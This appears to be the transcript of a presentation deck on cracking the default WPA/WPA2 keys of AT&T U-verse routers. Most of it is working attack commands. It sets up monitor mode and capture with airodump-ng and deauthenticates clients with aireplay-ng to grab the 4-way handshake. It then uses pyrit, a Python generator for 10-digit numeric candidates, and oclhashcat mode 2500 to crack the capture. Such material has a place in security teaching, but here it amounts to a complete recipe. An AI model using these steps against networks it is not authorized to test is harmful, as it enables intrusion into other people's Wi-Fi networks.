cracking at&t u-verse default wpa1/2 passwords
DESCRIPTION
Cracking AT&T U-verse Default WPA1/2 Passwords. . by Jason Wheeler Awesome blog: http://blog.init6.me E. Getting the Handshake. Aircrack's site has a pretty good tutorial. Boot from Back Track 5 R3 - PowerPoint PPT PresentationTRANSCRIPT
![Page 1: Cracking AT&T U-verse Default WPA1/2 Passwords](https://reader036.vdocuments.site/reader036/viewer/2022062310/56816766550346895ddc4abb/html5/thumbnails/1.jpg)
Cracking AT&T U-verse Default WPA1/2 Passwords.
by Jason WheelerAwesome blog: http://blog.init6.meE
![Page 2: Cracking AT&T U-verse Default WPA1/2 Passwords](https://reader036.vdocuments.site/reader036/viewer/2022062310/56816766550346895ddc4abb/html5/thumbnails/2.jpg)
Getting the Handshake
![Page 3: Cracking AT&T U-verse Default WPA1/2 Passwords](https://reader036.vdocuments.site/reader036/viewer/2022062310/56816766550346895ddc4abb/html5/thumbnails/3.jpg)
Aircrack's site has a pretty good tutorial.
Boot from Back Track 5 R3
First you want to see what kind of wifi connection you have to choose from. Start your wireless interface in monitor mode.
#airmon-zc start wlan0
#airodump-ng --encrypt wpa mon0
![Page 4: Cracking AT&T U-verse Default WPA1/2 Passwords](https://reader036.vdocuments.site/reader036/viewer/2022062310/56816766550346895ddc4abb/html5/thumbnails/4.jpg)
![Page 5: Cracking AT&T U-verse Default WPA1/2 Passwords](https://reader036.vdocuments.site/reader036/viewer/2022062310/56816766550346895ddc4abb/html5/thumbnails/5.jpg)
#airmon-zc stop mon0
Start airmon-zc on the channel of the target.
#airmon-zc start wlan0 <Channel Number>
Then start airodump on the same channel along with some other options.
#airodump-ng mon0 --encrypt wpa --write <FILENAME> --output-format pcap -a --channel <Channel number>
![Page 6: Cracking AT&T U-verse Default WPA1/2 Passwords](https://reader036.vdocuments.site/reader036/viewer/2022062310/56816766550346895ddc4abb/html5/thumbnails/6.jpg)
Deauthenticate a client#aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0
Where:• -0 means deauthentication• 5 is the number of deauths to send• -a 00:14:6C:7E:40:80 is the MAC address of the access point• -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are
deauthing• mon0 is the interface name
![Page 7: Cracking AT&T U-verse Default WPA1/2 Passwords](https://reader036.vdocuments.site/reader036/viewer/2022062310/56816766550346895ddc4abb/html5/thumbnails/7.jpg)
WPA Handshake
![Page 8: Cracking AT&T U-verse Default WPA1/2 Passwords](https://reader036.vdocuments.site/reader036/viewer/2022062310/56816766550346895ddc4abb/html5/thumbnails/8.jpg)
Verify 4-way Handshake
![Page 9: Cracking AT&T U-verse Default WPA1/2 Passwords](https://reader036.vdocuments.site/reader036/viewer/2022062310/56816766550346895ddc4abb/html5/thumbnails/9.jpg)
![Page 10: Cracking AT&T U-verse Default WPA1/2 Passwords](https://reader036.vdocuments.site/reader036/viewer/2022062310/56816766550346895ddc4abb/html5/thumbnails/10.jpg)
PMK = PBKDF2(passphrase, ssid, ssidLength, 4096, 256)The PTK is a keyed-HMAC function using the PMK on the two MAC addresses and the two nonces from the first two packets of the 4-Way Handshake.
![Page 11: Cracking AT&T U-verse Default WPA1/2 Passwords](https://reader036.vdocuments.site/reader036/viewer/2022062310/56816766550346895ddc4abb/html5/thumbnails/11.jpg)
![Page 12: Cracking AT&T U-verse Default WPA1/2 Passwords](https://reader036.vdocuments.site/reader036/viewer/2022062310/56816766550346895ddc4abb/html5/thumbnails/12.jpg)
![Page 13: Cracking AT&T U-verse Default WPA1/2 Passwords](https://reader036.vdocuments.site/reader036/viewer/2022062310/56816766550346895ddc4abb/html5/thumbnails/13.jpg)
![Page 14: Cracking AT&T U-verse Default WPA1/2 Passwords](https://reader036.vdocuments.site/reader036/viewer/2022062310/56816766550346895ddc4abb/html5/thumbnails/14.jpg)
![Page 15: Cracking AT&T U-verse Default WPA1/2 Passwords](https://reader036.vdocuments.site/reader036/viewer/2022062310/56816766550346895ddc4abb/html5/thumbnails/15.jpg)
![Page 16: Cracking AT&T U-verse Default WPA1/2 Passwords](https://reader036.vdocuments.site/reader036/viewer/2022062310/56816766550346895ddc4abb/html5/thumbnails/16.jpg)
Verify 4-way Handshake
The easy way......
#pyrit -r <FILENAME>.pcap analyze
![Page 17: Cracking AT&T U-verse Default WPA1/2 Passwords](https://reader036.vdocuments.site/reader036/viewer/2022062310/56816766550346895ddc4abb/html5/thumbnails/17.jpg)
![Page 18: Cracking AT&T U-verse Default WPA1/2 Passwords](https://reader036.vdocuments.site/reader036/viewer/2022062310/56816766550346895ddc4abb/html5/thumbnails/18.jpg)
![Page 19: Cracking AT&T U-verse Default WPA1/2 Passwords](https://reader036.vdocuments.site/reader036/viewer/2022062310/56816766550346895ddc4abb/html5/thumbnails/19.jpg)
Strip out the junk.
#pyrit -r <FILENAME>.pcap -o OUTPUT.pcap strip
![Page 20: Cracking AT&T U-verse Default WPA1/2 Passwords](https://reader036.vdocuments.site/reader036/viewer/2022062310/56816766550346895ddc4abb/html5/thumbnails/20.jpg)
CAP-2-HCCAPTo turn your pcap file into a hashcat-plus friendly file you can upload it
to https://hashcat.net/cap2hccap/
![Page 21: Cracking AT&T U-verse Default WPA1/2 Passwords](https://reader036.vdocuments.site/reader036/viewer/2022062310/56816766550346895ddc4abb/html5/thumbnails/21.jpg)
CRACK!!
![Page 22: Cracking AT&T U-verse Default WPA1/2 Passwords](https://reader036.vdocuments.site/reader036/viewer/2022062310/56816766550346895ddc4abb/html5/thumbnails/22.jpg)
Python Scriptimport sys
MAX_INT = 9999999999BAD_PATTERNS = {x * 3 for x in '0123456789'}
for number in xrange(MAX_INT): int_string = str(number).rjust(10, '0') if any(pattern in int_string for pattern in BAD_PATTERNS): continue print ( int_string )
![Page 23: Cracking AT&T U-verse Default WPA1/2 Passwords](https://reader036.vdocuments.site/reader036/viewer/2022062310/56816766550346895ddc4abb/html5/thumbnails/23.jpg)
Hashcat-plus$python 2wire.py | ./oclhashcat-plus64.bin -m 2500 -a 0
<filename>.hccap --gpu-accel=160 --gpu-loops=1024
88,770 c/s real or
$./oclhashcat-plus64.bin -m 2500 -a 3 <filename>.hccap --gpu-accel=160 --gpu-loops=1024 -1?d ?1?1?1?1?1?1?1?1?1?1
114K c/s real
![Page 25: Cracking AT&T U-verse Default WPA1/2 Passwords](https://reader036.vdocuments.site/reader036/viewer/2022062310/56816766550346895ddc4abb/html5/thumbnails/25.jpg)
sourceshttp://etutorials.org/Networking/802.11+security.+wi-fi+protected+access+and+802.11i/Part+II+The+Design+of+Wi-Fi+Security/Chapter+10.+WPA+and+RSN+Key+Hierarchy/